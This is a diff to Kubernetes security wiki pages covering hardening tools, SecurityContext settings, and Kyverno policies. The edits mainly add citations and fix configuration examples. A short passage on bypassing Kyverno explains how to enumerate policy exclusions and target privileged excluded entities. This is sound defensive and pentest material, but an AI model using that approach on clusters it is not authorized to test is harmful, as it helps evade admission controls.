+[**Mkat**](https://github.com/DataDog/managed-kubernetes-auditing-toolkit) is a tool built to test other type of high risk checks compared with the other tools. It mainly have 3 different modes:<sup>[[11]](#references)</sup>
 
-- **`find-role-relationships`**: Which will find which AWS roles are running in which pods
-- **`find-secrets`**: Which tries to identify secrets in K8s resources such as Pods, ConfigMaps, and Secrets.
-- **`test-imds-access`**: Which will try to run pods and try to access the metadata v1 and v2. WARNING: This will run a pod in the cluster, be very careful because maybe you don't want to do this!
+- **`find-role-relationships`**: Which will find which AWS roles are running in which pods<sup>[[11]](#references)</sup>
+- **`find-secrets`**: Which tries to identify secrets in K8s resources such as Pods, ConfigMaps, and Secrets.<sup>[[11]](#references)</sup>
+- **`test-imds-access`**: Which will try to run pods and try to access the metadata v1 and v2. WARNING: This will run a pod in the cluster, be very careful because maybe you don't want to do this!<sup>[[11]](#references)</sup>
+
+The toolkit documentation further describes these modes as finding AWS role relationships for pods, looking for hardcoded AWS credentials in Kubernetes resources, and creating temporary pods to test IMDSv1 and IMDSv2 access.<sup>[[11]](#references)</sup>
 
 ## **Audit IaC Code**
 
 ### [**KICS**](https://github.com/Checkmarx/kics)
 
-[**KICS**](https://github.com/Checkmarx/kics) finds **security vulnerabilities**, compliance issues, and infrastructure misconfigurations in the following **Infrastructure as Code solutions**: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible, Helm, Microsoft ARM, and OpenAPI 3.0 specifications
+[**KICS**](https://github.com/Checkmarx/kics) finds **security vulnerabilities**, compliance issues, and infrastructure misconfigurations in the following **Infrastructure as Code solutions**: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible, Helm, Microsoft ARM, and OpenAPI 3.0 specifications<sup>[[12]](#references)</sup>
+
+Here, Microsoft ARM refers to Azure Resource Manager (ARM).<sup>[[12]](#references)</sup>
 
 ### [**Checkov**](https://github.com/bridgecrewio/checkov)
 
-[**Checkov**](https://github.com/bridgecrewio/checkov) is a static code analysis tool for infrastructure-as-code.
+[**Checkov**](https://github.com/bridgecrewio/checkov) is a static code analysis tool for infrastructure-as-code.<sup>[[13]](#references)</sup>
 
-It scans cloud infrastructure provisioned using [Terraform](https://terraform.io), Terraform plan, [Cloudformation](https://aws.amazon.com/cloudformation/), [AWS SAM](https://aws.amazon.com/serverless/sam/), [Kubernetes](https://kubernetes.io), [Dockerfile](https://www.docker.com), [Serverless](https://www.serverless.com) or [ARM Templates](https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) and detects security and compliance misconfigurations using graph-based scanning.
+It scans cloud infrastructure provisioned using [Terraform](https://terraform.io), Terraform plan, [Cloudformation](https://aws.amazon.com/cloudformation/), [AWS SAM](https://aws.amazon.com/serverless/sam/), [Kubernetes](https://kubernetes.io), [Dockerfile](https://www.docker.com), [Serverless](https://www.serverless.com) or [ARM Templates](https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) and detects security and compliance misconfigurations using graph-based scanning.<sup>[[13]](#references)</sup>
 
 ### [**Kube-score**](https://github.com/zegl/kube-score)
 
-[**kube-score**](https://github.com/zegl/kube-score) is a tool that performs static code analysis of your Kubernetes object definitions.
+[**kube-score**](https://github.com/zegl/kube-score) is a tool that performs static code analysis of your Kubernetes object definitions.<sup>[[14]](#references)</sup>
 
-To install:
+To install:<sup>[[14]](#references)</sup>
 
 | Distribution                                        | Command / Link                                                                          |
 | --------------------------------------------------- | --------------------------------------------------------------------------------------- |
@@ -128,6 +132,8 @@ To install:
 
 ### [**Kube-linter**](https://github.com/stackrox/kube-linter)
 
+KubeLinter analyzes Kubernetes YAML files and Helm charts against best practices, with a focus on production readiness and security.<sup>[[15]](#references)</sup>
+
 ```bash
 # Install Kube-linter
 brew install kube-linter
@@ -138,6 +144,8 @@ brew install kube-linter
 
 ### [Checkov](https://github.com/bridgecrewio/checkov)
 
+Checkov can scan an IaC directory for security and compliance misconfigurations.<sup>[[13]](#references)</sup>
+
 ```bash
 # Install Checkov
 pip install checkov
@@ -147,6 +155,8 @@ checkov -d ./path/to/yaml/or/chart
 ```
 
 ### [kube‑score](https://github.com/zegl/kube-score)
+
+Use kube-score for static analysis of Kubernetes YAML and rendered Helm charts.<sup>[[14]](#references)</sup>
 
 ```bash
 # Install kube-score
@@ -163,6 +173,8 @@ helm template chart /path/to/chart \
 ```
 
 ### [Kubesec](https://github.com/controlplaneio/kubesec)
+
+Kubesec performs security risk analysis for Kubernetes resources and can scan YAML from files or standard input, including rendered Helm charts.<sup>[[16]](#references)</sup>
 
 ```bash
 # Install Kubesec
@@ -182,6 +194,8 @@ helm template chart /path/to/chart \
 ## Scan dependency issues
 
 ### Scan images
+
+The following uses Trivy's image target to scan the container images currently referenced by Pods.<sup>[[8]](#references)</sup>
 
 ```bash
 #!/bin/bash
@@ -211,6 +225,8 @@ done
 ```
 
 ### Scan Helm charts
+
+The following renders each Helm release and uses Trivy's configuration scanner against the resulting manifest.<sup>[[8]](#references)</sup>
 
 ```bash
 #!/bin/bash
@@ -261,7 +277,7 @@ echo "Helm chart scanning complete."
 
 ### Kubernetes PodSecurityContext and SecurityContext
 
-You can configure the **security context of the Pods** (with _PodSecurityContext_) and of the **containers** that are going to be run (with _SecurityContext_). For more information read:
+You can configure the **security context of the Pods** (with _PodSecurityContext_) and of the **containers** that are going to be run (with _SecurityContext_). For more information read:<sup>[[17]](#references)</sup>
 
 {{#ref}}
 kubernetes-securitycontext-s.md
@@ -269,10 +285,12 @@ kubernetes-securitycontext-s.md
 
 ### Kubernetes API Hardening
 
-It's very important to **protect the access to the Kubernetes Api Server** as a malicious actor with enough privileges could be able to abuse it and damage in a lot of way the environment.\
-It's important to secure both the **access** (**whitelist** origins to access the API Server and deny any other connection) and the [**authentication**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) (following the principle of **least** **privilege**). And definitely **never** **allow** **anonymous** **requests**.
+It's very important to **protect the access to the Kubernetes Api Server** as a malicious actor with enough privileges could be able to abuse it and damage in a lot of way the environment.<sup>[[21]](#references)</sup>\
+It's important to secure both the **access** (**whitelist** origins to access the API Server and deny any other connection) and the [**authentication**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) (following the principle of **least** **privilege**). And definitely **never** **allow** **anonymous** **requests**.<sup>[[21]](#references)[[19]](#references)</sup>
 
-**Common Request process:**\
+The current kubelet authentication and authorization guidance is documented [here](https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/).<sup>[[19]](#references)</sup>
+
+**Common Request process:**<sup>[[21]](#references)</sup>\
 User or K8s ServiceAccount –> Authentication –> Authorization –> Admission Control.
 
 **Tips**:
@@ -280,9 +298,9 @@ User or K8s ServiceAccount –> Authentication –> Authorization –> Admission
 - Close ports.
 - Avoid Anonymous access.
 - NodeRestriction; No access from specific nodes to the API.
-  - [https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction)
-  - Basically prevents kubelets from adding/removing/updating labels with a node-restriction.kubernetes.io/ prefix. This label prefix is reserved for administrators to label their Node objects for workload isolation purposes, and kubelets will not be allowed to modify labels with that prefix.
-  - And also, allows kubelets to add/remove/update these labels and label prefixes.
+  - [https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction)<sup>[[20]](#references)</sup>
+  - Basically prevents kubelets from adding/removing/updating labels with a node-restriction.kubernetes.io/ prefix. This label prefix is reserved for administrators to label their Node objects for workload isolation purposes, and kubelets will not be allowed to modify labels with that prefix.<sup>[[20]](#references)</sup>
+  - And also, allows kubelets to add/remove/update these labels and label prefixes.<sup>[[20]](#references)</sup>
 - Ensure with labels the secure workload isolation.
 - Avoid specific pods from API access.
 - Avoid ApiServer exposure to the internet.
@@ -291,7 +309,7 @@ User or K8s ServiceAccount –> Authentication –> Authorization –> Admission
 
 ### SecurityContext Hardening
 
-By default root user will be used when a Pod is started if no other user is specified. You can run your application inside a more secure context using a template similar to the following one:
+By default root user will be used when a Pod is started if no other user is specified. You can run your application inside a more secure context using a template similar to the following one:<sup>[[17]](#references)</sup>
 
 ```yaml
 apiVersion: v1
@@ -319,8 +337,10 @@ spec:
       allowPrivilegeEscalation: true
 ```
 
-- [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
-- [https://kubernetes.io/docs/concepts/policy/pod-security-policy/](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)
+- [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)<sup>[[17]](#references)</sup>
+- [https://kubernetes.io/docs/concepts/policy/pod-security-policy/](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)<sup>[[18]](#references)</sup>
+
+PodSecurityPolicy was deprecated in Kubernetes v1.21 and removed in v1.25; use Pod Security Admission or a third-party admission plugin instead.<sup>[[18]](#references)</sup>
 
 ### General Hardening
 
@@ -329,9 +349,11 @@ You should update your Kubernetes environment as frequently as necessary to have
 - Dependencies up to date.
 - Bug and security patches.
 
-[**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): Each 3 months there is a new minor release -- 1.20.3 = 1(Major).20(Minor).3(patch)
+[**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): Each 3 months there is a new minor release -- 1.20.3 = 1(Major).20(Minor).3(patch)<sup>[[22]](#references)[[23]](#references)</sup>
 
-**The best way to update a Kubernetes Cluster is (from** [**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):**
+Kubernetes currently releases approximately three times per year, and its versions use the `major.minor.patch` format; for example, 1.20.3 means 1 (major), 20 (minor), and 3 (patch).<sup>[[22]](#references)[[23]](#references)</sup>
+
+**The best way to update a Kubernetes Cluster is (from** [**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):**<sup>[[24]](#references)</sup>
 
 - Upgrade the Master Node components following this sequence:
   - etcd (all instances).
@@ -343,12 +365,40 @@ You should update your Kubernetes environment as frequently as necessary to have
 
 ## Kubernetes monitoring & security:
 
-- Kyverno Policy Engine
-- Cilium Tetragon - eBPF-based Security Observability and Runtime Enforcement
-- Network Security Policies
-- Falco - Runtime security monitoring & detection
+- Kyverno Policy Engine<sup>[[25]](#references)</sup>
+- Cilium Tetragon - eBPF-based Security Observability and Runtime Enforcement<sup>[[26]](#references)</sup>
+- Network Security Policies<sup>[[27]](#references)</sup>
+- Falco - Runtime security monitoring & detection<sup>[[28]](#references)</sup>
+
+## References
+
+- [1] [Steampipe Kubernetes Compliance](https://github.com/turbot/steampipe-mod-kubernetes-compliance)
+- [2] [Kubescape](https://github.com/kubescape/kubescape)
+- [3] [Popeye](https://github.com/derailed/popeye)
+- [4] [CIS Kubernetes Benchmarks](https://www.cisecurity.org/benchmark/kubernetes/)
+- [5] [kube-bench](https://github.com/aquasecurity/kube-bench)
+- [6] [kubeaudit](https://github.com/Shopify/kubeaudit)
+- [7] [kube-hunter](https://github.com/aquasecurity/kube-hunter)
+- [8] [Trivy](https://github.com/aquasecurity/trivy)
+- [9] [Kubei](https://github.com/Erezf-p/kubei)
+- [10] [KubiScan](https://github.com/cyberark/KubiScan)
+- [11] [Managed Kubernetes Auditing Toolkit](https://github.com/DataDog/managed-kubernetes-auditing-toolkit)
+- [12] [KICS supported platforms](https://docs.kics.io/dev/platforms/)
+- [13] [Checkov](https://github.com/bridgecrewio/checkov)
+- [14] [kube-score](https://github.com/zegl/kube-score)
+- [15] [KubeLinter](https://github.com/stackrox/kube-linter)
+- [16] [Kubesec](https://github.com/controlplaneio/kubesec)
+- [17] [Configure a Security Context for a Pod or Container](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
+- [18] [Pod Security Policies](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)
+- [19] [Kubelet authentication and authorization](https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/)
+- [20] [NodeRestriction admission controller](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction)
+- [21] [Controlling Access to the Kubernetes API](https://kubernetes.io/docs/concepts/security/controlling-access/)
+- [22] [Kubernetes Release Cycle](https://kubernetes.io/releases/release/)
+- [23] [Kubernetes version skew policy](https://kubernetes.io/docs/setup/release/version-skew-policy/)
+- [24] [Upgrading a cluster](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)
+- [25] [Kyverno](https://github.com/kyverno/kyverno)
+- [26] [Cilium Tetragon](https://github.com/cilium/tetragon)
+- [27] [Network Policies](https://kubernetes.io/docs/concepts/services-networking/network-policies/)
+- [28] [Falco](https://github.com/falcosecurity/falco)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md
@@ -4,14 +4,16 @@
 
 ## PodSecurityContext <a href="#podsecuritycontext-v1-core" id="podsecuritycontext-v1-core"></a>
 
-[**From the docs:**](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core)
+[**From the docs:**](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core)<sup>[[1]](#references)</sup>
 
 When specifying the security context of a Pod you can use several attributes. From a defensive security point of view you should consider:
 
-- To have **runASNonRoot** as **True**
+- To have **runAsNonRoot** as **True**
 - To configure **runAsUser**
 - If possible, consider **limiting** **permissions** indicating **seLinuxOptions** and **seccompProfile**
 - Do **NOT** give **privilege** **group** access via **runAsGroup** and **supplementaryGroups**
+
+The field definitions below summarize the Kubernetes v1.23 `PodSecurityContext` API reference.<sup>[[1]](#references)</sup>
 
 | Parameter                                                                                                                                                                                                                                                                                                                                                                                                                                  | Description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           |
 | <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>fsGroup</strong></a><br><em>integer</em></p>                                                                                                                                                                                                                                                 | <p>A special supplemental group that applies to <strong>all containers in a pod</strong>. Some volume types allow the Kubelet to <strong>change the ownership of that volume</strong> to be owned by the pod:<br>1. The owning GID will be the FSGroup<br>2. The setgid bit is set (new files created in the volume will be owned by FSGroup)<br>3. The permission bits are OR'd with rw-rw---- If unset, the Kubelet will not modify the ownership and permissions of any volume</p> |
@@ -28,19 +30,21 @@ When specifying the security context of a Pod you can use several attributes. Fr
 
 ## SecurityContext
 
-[**From the docs:**](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core)
+[**From the docs:**](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core)<sup>[[2]](#references)</sup>
 
 This context is set inside the **containers definitions**. From a defensive security point of view you should consider:
 
 - **allowPrivilegeEscalation** to **False**
 - Do not add sensitive **capabilities** (and remove the ones you don't need)
 - **privileged** to **False**
-- If possible, set **readOnlyFilesystem** as **True**
+- If possible, set **readOnlyRootFilesystem** as **True**
 - Set **runAsNonRoot** to **True** and set a **runAsUser**
 - If possible, consider **limiting** **permissions** indicating **seLinuxOptions** and **seccompProfile**
 - Do **NOT** give **privilege** **group** access via **runAsGroup.**
 
-Note that the attributes set in **both SecurityContext and PodSecurityContext**, the value specified in **SecurityContext** takes **precedence**.
+Note that the attributes set in **both SecurityContext and PodSecurityContext**, the value specified in **SecurityContext** takes **precedence**.<sup>[[1]](#references)[[2]](#references)</sup>
+
+The field definitions below summarize the Kubernetes v1.23 `SecurityContext` API reference.<sup>[[2]](#references)</sup>
 
 | <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core"><strong>allowPrivilegeEscalation</strong></a><br><em>boolean</em></p>                                                                                                                                                                      | **AllowPrivilegeEscalation** controls whether a process can **gain more privileges** than its parent process. This bool directly controls if the no_new_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is run as **Privileged** or has **CAP_SYS_ADMIN** |
 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
@@ -57,34 +61,35 @@ Note that the attributes set in **both SecurityContext and PodSecurityContext**,
 
 ## Practical workload review checklist
 
-When reviewing a Pod or workload template, inspect both `spec.securityContext` and every container-level `securityContext` under `containers`, `initContainers`, and `ephemeralContainers`. Container-level fields can override the pod-level defaults, so a safe-looking pod default does not guarantee that every container is safe.
+When reviewing a Pod or workload template, inspect both `spec.securityContext` and every container-level `securityContext` under `containers`, `initContainers`, and `ephemeralContainers`. Container-level fields can override the pod-level defaults, so a safe-looking pod default does not guarantee that every container is safe.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 High-risk combinations to prioritize:
 
-- `privileged: true`, especially with `hostPID`, `hostIPC`, `hostNetwork`, `hostPath`, host ports, or runtime socket mounts.
-- Added capabilities such as `SYS_ADMIN`, `NET_ADMIN`, `SYS_PTRACE`, `SYS_MODULE`, `DAC_READ_SEARCH`, or `DAC_OVERRIDE`.
-- `allowPrivilegeEscalation: true` or unset in containers that can execute attacker-controlled code.
-- `seccompProfile: Unconfined`, `procMount: Unmasked`, or missing runtime profiles on sensitive workloads.
-- Writable root filesystems or broad writable volume mounts in workloads that process untrusted input.
-- Missing CPU, memory, or ephemeral-storage requests and limits in multi-tenant namespaces.
-- Missing or unrealistic pod-level `spec.resources` budgets, and principals with `patch` or `update` on the Pod `resize` subresource, because supported clusters can change running CPU and memory desired state without recreating the Pod.
+- `privileged: true`, especially with `hostPID`, `hostIPC`, `hostNetwork`, `hostPath`, or host ports.<sup>[[5]](#references)[[6]](#references)</sup> Runtime socket mounts are another high-risk combination.<sup>[[10]](#references)</sup>
+- Added capabilities such as `SYS_ADMIN`, `NET_ADMIN`, `SYS_PTRACE`, `SYS_MODULE`, `DAC_READ_SEARCH`, or `DAC_OVERRIDE`.<sup>[[5]](#references)[[6]](#references)</sup>
+- `allowPrivilegeEscalation: true` or unset in containers that can execute attacker-controlled code.<sup>[[2]](#references)[[3]](#references)[[6]](#references)</sup>
+- `seccompProfile: Unconfined`, `procMount: Unmasked`, or missing runtime profiles on sensitive workloads.<sup>[[5]](#references)[[6]](#references)</sup>
+- Writable root filesystems or broad writable volume mounts in workloads that process untrusted input.<sup>[[2]](#references)[[3]](#references)[[10]](#references)</sup>
+- Missing CPU, memory, or ephemeral-storage requests and limits in multi-tenant namespaces.<sup>[[4]](#references)</sup>
+- Missing or unrealistic pod-level `spec.resources` budgets.<sup>[[4]](#references)[[8]](#references)</sup> Also review principals with `patch` or `update` on the Pod `resize` subresource: supported clusters can change running CPU and memory desired state without recreating the Pod.<sup>[[9]](#references)</sup>
 
-Resource controls are not part of `securityContext`, but review them in the same workload pass because they define the availability boundary. Modern Kubernetes can define CPU, memory, and hugepage budgets at Pod level under `spec.resources` in addition to container-level `resources`. A Pod with sidecars may be bounded by an aggregate Pod envelope even when one container has no individual limits, while local ephemeral storage still needs separate `ephemeral-storage` limits, `emptyDir.sizeLimit`, LimitRanges, and ResourceQuotas. Also compare desired resources in the Pod spec with `status.containerStatuses[].resources` after an in-place resize request; a failed or pending resize can leave the requested value in `spec` while the kubelet keeps the previous runtime allocation and reports a `PodResizePending` condition.
+Resource controls are not part of `securityContext`, but review them in the same workload pass because they define the availability boundary.<sup>[[4]](#references)</sup> Modern Kubernetes can define CPU, memory, and hugepage budgets at Pod level under `spec.resources` in addition to container-level `resources` when the `PodLevelResources` feature gate is enabled.<sup>[[4]](#references)[[8]](#references)</sup> A Pod with sidecars may be bounded by an aggregate Pod envelope even when one container has no individual limits, while local ephemeral storage still needs separate `ephemeral-storage` limits, `emptyDir.sizeLimit`, LimitRanges, and ResourceQuotas.<sup>[[4]](#references)[[10]](#references)</sup> Also compare desired resources in the Pod spec with `status.containerStatuses[].resources` after an in-place resize request; a failed or pending resize can leave the requested value in `spec` while the kubelet keeps the previous runtime allocation and reports a `PodResizePending` condition.<sup>[[9]](#references)</sup>
 
-For most application workloads, a good baseline is to run as a non-root UID, set `runAsNonRoot: true`, set `allowPrivilegeEscalation: false`, drop all capabilities and add back only the minimum required ones, use `seccompProfile: RuntimeDefault`, prefer a read-only root filesystem, and avoid host namespaces, hostPath mounts, and privileged mode.
+For most application workloads, a good baseline is to run as a non-root UID, set `runAsNonRoot: true`, set `allowPrivilegeEscalation: false`, drop all capabilities and add back only the minimum required ones, use `seccompProfile: RuntimeDefault`, prefer a read-only root filesystem, and avoid host namespaces, hostPath mounts, and privileged mode.<sup>[[3]](#references)[[5]](#references)[[6]](#references)</sup>
 
-At cluster level, use [Pod Security Admission](https://kubernetes.io/docs/concepts/security/pod-security-admission/) namespace labels to enforce the Kubernetes [Pod Security Standards](https://kubernetes.io/docs/concepts/security/pod-security-standards/) where possible. Use `restricted` for namespaces that can support it, at least `baseline` for ordinary application namespaces, and keep privileged exceptions narrow, documented, and isolated to trusted platform namespaces or node pools.
+At cluster level, use [Pod Security Admission](https://kubernetes.io/docs/concepts/security/pod-security-admission/) namespace labels to enforce the Kubernetes [Pod Security Standards](https://kubernetes.io/docs/concepts/security/pod-security-standards/) where possible. Use `restricted` for namespaces that can support it, at least `baseline` for ordinary application namespaces, and keep privileged exceptions narrow, documented, and isolated to trusted platform namespaces or node pools.<sup>[[6]](#references)[[7]](#references)</sup>
 
 ## References
 
-- [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core)
-- [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core)
-- [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
-- [https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/](https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/)
-- [https://kubernetes.io/docs/concepts/security/linux-kernel-security-constraints/](https://kubernetes.io/docs/concepts/security/linux-kernel-security-constraints/)
-- [https://kubernetes.io/docs/concepts/security/pod-security-standards/](https://kubernetes.io/docs/concepts/security/pod-security-standards/)
-- [https://kubernetes.io/docs/concepts/security/pod-security-admission/](https://kubernetes.io/docs/concepts/security/pod-security-admission/)
-- [https://kubernetes.io/docs/tasks/configure-pod-container/assign-pod-level-resources/](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pod-level-resources/)
-- [https://kubernetes.io/docs/tasks/configure-pod-container/resize-container-resources/](https://kubernetes.io/docs/tasks/configure-pod-container/resize-container-resources/)
+- [1] [PodSecurityContext v1 core | Kubernetes API Reference Docs](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core)
+- [2] [SecurityContext v1 core | Kubernetes API Reference Docs](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core)
+- [3] [Configure a Security Context for a Pod or Container | Kubernetes](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
+- [4] [Resource Management for Pods and Containers | Kubernetes](https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/)
+- [5] [Linux kernel security constraints for Pods and containers | Kubernetes](https://kubernetes.io/docs/concepts/security/linux-kernel-security-constraints/)
+- [6] [Pod Security Standards | Kubernetes](https://kubernetes.io/docs/concepts/security/pod-security-standards/)
+- [7] [Pod Security Admission | Kubernetes](https://kubernetes.io/docs/concepts/security/pod-security-admission/)
+- [8] [Assign Pod-level CPU and memory resources | Kubernetes](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pod-level-resources/)
+- [9] [Resize CPU and Memory Resources assigned to Containers | Kubernetes](https://kubernetes.io/docs/tasks/configure-pod-container/resize-container-resources/)
+- [10] [Volumes | Kubernetes](https://kubernetes.io/docs/concepts/storage/volumes/#emptydir)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md
@@ -6,7 +6,7 @@
 
 ## Definition
 
-Kyverno is an open-source, policy management framework for Kubernetes that enables organizations to define, enforce, and audit policies across their entire Kubernetes infrastructure. It provides a scalable, extensible, and highly customizable solution for managing the security, compliance, and governance of Kubernetes clusters.
+Kyverno is an open-source, policy management framework for Kubernetes that enables organizations to define, enforce, and audit policies across their entire Kubernetes infrastructure. It provides a scalable, extensible, and highly customizable solution for managing the security, compliance, and governance of Kubernetes clusters. <sup>[[1]](#references)[[2]](#references)</sup>
 
 ## Use cases
 
@@ -22,7 +22,9 @@ Let's say we have a Kubernetes cluster with multiple namespaces, and we want to 
 
 **ClusterPolicy**
 
-A ClusterPolicy is a high-level policy that defines the overall policy intent. In this case, our ClusterPolicy might look like this:
+A ClusterPolicy is a high-level policy that defines the overall policy intent. In this case, our ClusterPolicy might look like this: <sup>[[3]](#references)</sup>
+
+**Original / legacy example (preserved verbatim)**
 
 ```yaml
 apiVersion: kyverno.io/v1
@@ -51,11 +53,52 @@ spec:
                 validationFailureAction: enforce
 ```
 
-When a pod is created in the `default` namespace without the label `app: myapp`, Kyverno will block the request and return an error message indicating that the pod does not meet the policy requirements.
+When a pod is created in the `default` namespace without the label `app: myapp`, Kyverno will block the request and return an error message indicating that the pod does not meet the policy requirements. <sup>[[5]](#references)[[6]](#references)</sup>
+
+The block above is retained as the original page example, but its rule nesting is not the current Kyverno schema. Its `namespaceSelector.matchLabels` also selects Namespace labels rather than the Namespace name; use the valid form below when targeting the `default` namespace by name. <sup>[[3]](#references)[[4]](#references)</sup>
+
+**Current corrected ClusterPolicy example**
+
+The current form places `match` alongside `validate`, uses the `namespaces` matcher for the namespace name, and defines the required label under `validate.pattern`. <sup>[[4]](#references)[[5]](#references)</sup>
+
+```yaml
+apiVersion: kyverno.io/v1
+kind: ClusterPolicy
+metadata:
+  name: require-label
+spec:
+  rules:
+  - name: require-label
+    match:
+      any:
+      - resources:
+          kinds:
+            - Pod
+          namespaces:
+            - default
+    validate:
+      failureAction: Enforce
+      message: "Pods in the default namespace must have the label 'app: myapp'"
+      pattern:
+        metadata:
+          labels:
+            app: myapp
+```
+
+The `namespaces` matcher targets the namespace by name. If a namespace label is the intended scope instead, use `namespaceSelector.matchLabels`; Kyverno evaluates that selector against labels on the Namespace. <sup>[[4]](#references)</sup>
+
+Use `validate.failureAction: Enforce` for this rule; Kyverno documents the older `spec.validationFailureAction` field as deprecated. <sup>[[5]](#references)</sup>
+
+With Kyverno running as a Kubernetes admission controller and this rule set to `Enforce`, creating a pod in the `default` namespace without the label `app: myapp` blocks the request and returns a validation error. <sup>[[5]](#references)[[6]](#references)</sup>
 
 ## References
 
-* [https://kyverno.io/](https://kyverno.io/)
+- [1] [Kyverno](https://kyverno.io/)
+- [2] [Introduction | Kyverno](https://kyverno.io/docs/introduction/)
+- [3] [Overview | Kyverno](https://kyverno.io/docs/policy-types/cluster-policy/overview/)
+- [4] [Selecting Resources | Kyverno](https://kyverno.io/docs/policy-types/cluster-policy/match-exclude/)
+- [5] [Validate Rules | Kyverno](https://kyverno.io/docs/policy-types/cluster-policy/validate/)
+- [6] [Applying Policies | Kyverno](https://kyverno.io/docs/guides/applying-policies/)
 
 
 

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md
@@ -18,15 +18,17 @@ $ kubectl get policies
 
 ### Enumerate Excluded
 
-For each ClusterPolicy and Policy, you can specify a list of excluded entities, including:
+For each `ClusterPolicy` and `Policy`, inspect the rule's `exclude` block for entities that are exempt from processing:<sup>[[1]](#references)[[2]](#references)</sup>
 
-- Groups: `excludedGroups`
-- Users: `excludedUsers`
-- Service Accounts (SA): `excludedServiceAccounts`
-- Roles: `excludedRoles`
-- Cluster Roles: `excludedClusterRoles`
+- Groups: `excludedGroups` (policy `subjects` with `kind: Group`)
+- Users: `excludedUsers` (policy `subjects` with `kind: User`)
+- Service Accounts (SA): `excludedServiceAccounts` (policy `subjects` with `kind: ServiceAccount`)
+- Roles: `excludedRoles` (policy `roles`)
+- Cluster Roles: `excludedClusterRoles` (policy `clusterRoles`)
 
-These excluded entities will be exempt from the policy requirements, and Kyverno will not enforce the policy for them.
+The `excluded...` names above describe categories; the parenthesized names are the literal filters used in a Kyverno policy's `exclude` block.<sup>[[2]](#references)</sup>
+
+These excluded entities will be exempt from the policy requirements, and Kyverno will not enforce the policy for them.<sup>[[2]](#references)</sup>
 
 ## Example
 
@@ -52,11 +54,13 @@ exclude:
           name: system:serviceaccount:AHAH:*
 ```
 
-Within a cluster, numerous added components, operators, and applications may necessitate exclusion from a cluster policy. However, this can be exploited by targeting privileged entities. In some cases, it may appear that a namespace does not exist or that you lack permission to impersonate a user, which can be a sign of misconfiguration.
+The `any` block makes the `clusterRoles` and `subjects` exclusions alternatives, so either matching condition can exempt a request.<sup>[[2]](#references)</sup>
+
+Within a cluster, numerous added components, operators, and applications may necessitate exclusion from a cluster policy. However, this can be exploited by targeting privileged entities. In some cases, it may appear that a namespace does not exist or that you lack permission to impersonate a user, which can be a sign of misconfiguration.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ## Abusing ValidatingWebhookConfiguration
 
